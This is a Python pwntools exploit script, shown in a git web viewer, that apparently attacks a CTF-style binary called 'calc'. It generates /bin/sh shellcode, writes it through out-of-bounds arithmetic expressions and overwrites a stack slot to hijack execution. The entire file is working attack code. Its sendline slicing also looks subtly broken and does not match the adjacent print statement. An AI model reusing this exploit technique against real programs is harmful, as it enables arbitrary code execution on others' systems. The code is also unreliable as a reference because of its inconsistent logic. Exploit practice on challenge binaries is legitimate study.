blob: b765e85e1374d0d469a6ef76d9232f67ab8f22b5 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
#!/usr/bin/env python3
from pwn import *
context.binary = './calc'
shellcode = asm(shellcraft.sh())
pid = process("./calc")
print(shellcode.hex())
print(context)
shellen = len(shellcode)
for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))):
pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big')))
print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big')))
pid.sendline("+360+135151459")
print("+360+135151459")
#pid.interactive()
print(pid.recv())
|
